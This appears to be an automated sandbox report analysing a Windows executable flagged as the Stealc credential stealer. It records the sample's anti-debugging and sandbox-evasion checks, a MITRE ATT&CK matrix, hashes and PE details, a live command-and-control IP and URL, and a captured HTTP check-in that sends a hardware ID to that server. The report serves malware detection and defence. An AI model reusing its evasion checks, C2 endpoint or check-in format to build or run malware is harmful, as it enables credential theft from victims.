              Source: file.exe, 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26510
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26665
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26657
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26528
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26677
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4A60 VirtualProtect 00000000,00000004,00000100,?0_2_006D4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F6390 mov eax, dword ptr fs:[00000030h]0_2_006F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006F2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3992, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_006F4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_006F46A0
              Source: file.exe, file.exe, 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_006F2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_006F2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006F2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_006F2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3992, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3992, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.Generic
              file.exe49%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206-0%Avira URL Cloudsafe
              http://185.215.113.206/c4becf79229cb002.phps0_100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpk1G100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpC0o100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206-file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.215.113.206/0file.exe, 00000000.00000002.2220139315.0000000001039000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.phps0_file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.206/c4becf79229cb002.phpC0ofile.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.206/c4becf79229cb002.phpk1Gfile.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1561767
                          Start date and time:2024-11-24 08:45:09 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 59s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 79%
                          • Number of executed functions: 18
                          • Number of non-executed functions: 122
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.43
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.945527901436716
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'818'624 bytes
                          MD5:25fa991e349149a46f237995246dcac2
                          SHA1:581f619ac0a4f4f6e995e14a419b3a5d5e50bbcf
                          SHA256:6a076f8ee05524ec960150149ced7df5c5953f6fe04de4fada9c5d3439552eb5
                          SHA512:1f1fab8071358dc1017f89e992e76ac1ea01f75566010cd61fd1f9f1d3225f3e1a6405aa3fc37488c6ee205fd7cbdc4af4e04603f2202e80baca21e8a10fe9a2
                          SSDEEP:24576:GmWo75/1/t1278AIYO5zFZpi0KoJ71oIrNyxlgFnrrQee9zT50bmji984Y3hpCcL:GmT51KYxZ40d713KgrSzTYaiBY3PTB
                          TLSH:558533426381F688FBA7E7BFB2C2394A33811592642E0797FC085535F97BB419C52E36
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xaa0000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007FD184E0102Ah
                          setle byte ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ebx], cl
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00h], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [ecx], eax
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2490000x16200b009a15e12521b42062008886842fe9bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x24a0000x2b00x200a4e87cd81c8411ef36a4facf8e9cdce1False0.802734375data6.036865365874904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x24c0000x2b10000x200fe993a79a21b9edee6c9eb8a1276f623unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          ktlotalb0x4fd0000x1a20000x1a200004698fd89776c7198b6b370a1c3492f4False0.9947270297547847data7.953808947357536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          fvaiddkx0x69f0000x10000x60053c4447bcea826decedadd05edbd5b07False0.5852864583333334data5.032552949115954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6a00000x30000x2200856a3efdd8bba0cc61a7fb0b21199954False0.06043198529411765DOS executable (COM)0.5803765048413185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x69eca40x256ASCII text, with CRLF line terminators0.5100334448160535

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-11-24T08:46:06.690752+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649708185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 24, 2024 08:46:04.763803959 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:04.883460045 CET8049708185.215.113.206192.168.2.6
                          Nov 24, 2024 08:46:04.883539915 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:04.887257099 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:05.006911039 CET8049708185.215.113.206192.168.2.6
                          Nov 24, 2024 08:46:06.231559038 CET8049708185.215.113.206192.168.2.6
                          Nov 24, 2024 08:46:06.231623888 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:06.237441063 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:06.356880903 CET8049708185.215.113.206192.168.2.6
                          Nov 24, 2024 08:46:06.690685987 CET8049708185.215.113.206192.168.2.6
                          Nov 24, 2024 08:46:06.690752029 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:11.695185900 CET8049708185.215.113.206192.168.2.6
                          Nov 24, 2024 08:46:11.695242882 CET4970880192.168.2.6185.215.113.206
                          Nov 24, 2024 08:46:11.892369986 CET4970880192.168.2.6185.215.113.206

                          HTTP Request Dependency Graph

                          • 185.215.113.206

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649708185.215.113.206803992C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Nov 24, 2024 08:46:04.887257099 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 24, 2024 08:46:06.231559038 CET203INHTTP/1.1 200 OK
                          Date: Sun, 24 Nov 2024 07:46:06 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 24, 2024 08:46:06.237441063 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 33 30 46 32 42 37 37 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a
                          Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="hwid"F730F2B77D8C1730677652------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="build"mars------GHJDGDBFCBKFHJKFHCBK--
                          Nov 24, 2024 08:46:06.690685987 CET210INHTTP/1.1 200 OK
                          Date: Sun, 24 Nov 2024 07:46:06 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:02:45:59
                          Start date:24/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x6d0000
                          File size:1'818'624 bytes
                          MD5 hash:25FA991E349149A46F237995246DCAC2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:4.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.3%
                            Total number of Nodes:1406
                            Total number of Limit Nodes:28
